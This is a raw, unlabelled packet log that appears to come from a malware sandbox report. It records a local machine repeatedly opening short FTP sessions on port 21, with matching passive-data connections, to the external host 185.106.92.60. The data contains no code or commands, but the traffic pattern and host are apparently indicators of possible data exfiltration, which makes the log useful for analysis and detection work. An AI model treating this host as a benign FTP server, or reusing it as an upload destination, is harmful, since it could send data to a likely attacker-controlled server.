                                                                                                                                    Oct 10, 2022 06:02:42.886110067 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.912198067 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.912272930 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.912497044 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.912498951 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.912606955 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.912703037 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.935904980 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.936125040 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.936211109 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.959878922 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.960155010 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.960331917 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.983278990 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:42.983556986 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:42.983829975 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.007255077 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.007504940 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.008136034 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.031322002 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.031582117 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.054985046 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.079026937 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.079188108 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.080472946 CEST4981664574192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.103209019 CEST6457449816185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.103563070 CEST4981664574192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.107222080 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.131665945 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.131794930 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.132426023 CEST4981664574192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.154934883 CEST6457449816185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.157618999 CEST6457449816185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.157924891 CEST4981664574192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.159756899 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.159945011 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.160031080 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.182836056 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.183069944 CEST2149815185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.183181047 CEST4981521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.301487923 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.325711012 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.325954914 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.353720903 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.353804111 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.353880882 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.353880882 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.353920937 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.353976011 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.354187965 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.378582001 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.378742933 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.378812075 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.435987949 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.436130047 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.436243057 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.460880041 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.461045980 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.461141109 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.485513926 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.485676050 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.486064911 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.510400057 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.510571003 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.512634993 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.537344933 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.537476063 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.538039923 CEST4981864575192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.562941074 CEST6457549818185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.563180923 CEST4981864575192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.563335896 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.588567972 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.588741064 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.589680910 CEST4981864575192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.613786936 CEST6457549818185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.614078045 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.614166975 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.614289045 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.614563942 CEST6457549818185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.614643097 CEST4981864575192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.638262033 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.638313055 CEST2149817185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.638411999 CEST4981721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.759884119 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.783588886 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.783736944 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.810986996 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.811039925 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.811073065 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.811259985 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.811259985 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.811259985 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.811357021 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.835815907 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.835922003 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.836221933 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.859904051 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.860075951 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.864624977 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.889187098 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.889333963 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.890650034 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.914772987 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.914949894 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.915416002 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.939260006 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.939379930 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.940349102 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.965512991 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.965615988 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.965985060 CEST4982064576192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.989069939 CEST6457649820185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:43.989264011 CEST4982064576192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:43.989512920 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.013617039 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.013770103 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.014231920 CEST4982064576192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.037125111 CEST6457649820185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.037168026 CEST6457649820185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.037245989 CEST4982064576192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.037533998 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.037677050 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.037755013 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.062401056 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.062448978 CEST2149819185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.062643051 CEST4981921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.186861038 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.209635019 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.209822893 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.235219955 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.235280991 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.235487938 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.235517979 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.235606909 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.235974073 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.259345055 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.259589911 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.259772062 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.282490969 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.282915115 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.283109903 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.306058884 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.306307077 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.306684971 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.329652071 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.329967976 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.330324888 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.352972031 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.353257895 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.354415894 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.377429962 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.377830029 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.378217936 CEST4982264578192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.402443886 CEST6457849822185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.402654886 CEST4982264578192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.404473066 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.427429914 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.427639008 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.428204060 CEST4982264578192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.452200890 CEST6457849822185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.452234030 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.452255011 CEST6457849822185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.452325106 CEST4982264578192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.452351093 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.452491999 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.474807024 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.475472927 CEST2149821185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.475589037 CEST4982121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.586658955 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.611181021 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.611417055 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.640980959 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.641035080 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.641084909 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.641300917 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.641531944 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.641531944 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.666435003 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.667448997 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.674918890 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.700181007 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.700367928 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.700474024 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.725761890 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.726154089 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.726260900 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.759330034 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.761348009 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.761794090 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.786695004 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.789232016 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.796587944 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.822503090 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.822860956 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.823515892 CEST4982464579192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.850044966 CEST6457949824185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.850337029 CEST4982464579192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.850931883 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.877836943 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.881306887 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.881949902 CEST4982464579192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.907165051 CEST6457949824185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.907234907 CEST6457949824185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.907562017 CEST4982464579192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.909399033 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.909545898 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.909867048 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:44.934050083 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.934123993 CEST2149823185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:44.934339046 CEST4982321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.097320080 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.122349977 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.122498035 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.149410963 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.149487972 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.149521112 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.149593115 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.149635077 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.150082111 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.174909115 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.177259922 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.177341938 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.203219891 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.205235958 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.217294931 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.242188931 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.245245934 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.245377064 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.270766973 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.271266937 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.271661043 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.296742916 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.299458981 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.300302029 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.326251984 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.327936888 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.328248978 CEST4982664580192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.352658987 CEST6458049826185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.352981091 CEST4982664580192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.353147030 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.378237009 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.381275892 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.381817102 CEST4982664580192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.406658888 CEST6458049826185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.406763077 CEST6458049826185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.406977892 CEST4982664580192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.407299042 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.407464981 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.409671068 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.433686972 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.433860064 CEST2149825185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.433975935 CEST4982521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.563695908 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.586399078 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.586570978 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.612479925 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.612543106 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.612564087 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.612900972 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.612900972 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.636058092 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.636352062 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.642865896 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.666054964 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.666270018 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.666336060 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.689239025 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.689408064 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.689462900 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.712707043 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.713035107 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.713669062 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.736375093 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.736545086 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.738843918 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.762361050 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.762697935 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.763163090 CEST4982864581192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.786720991 CEST6458149828185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.786837101 CEST4982864581192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.787090063 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.870044947 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.887569904 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.887912035 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.888322115 CEST4982864581192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.912348032 CEST6458149828185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.912427902 CEST6458149828185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.912688017 CEST4982864581192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.913106918 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.913321972 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.913474083 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:45.935880899 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.935914993 CEST2149827185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:45.936146021 CEST4982721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.067148924 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.090075016 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.090267897 CEST4982921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:46.116816998 CEST2149829185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:46.116871119 CEST2149829185.106.92.60192.168.2.3
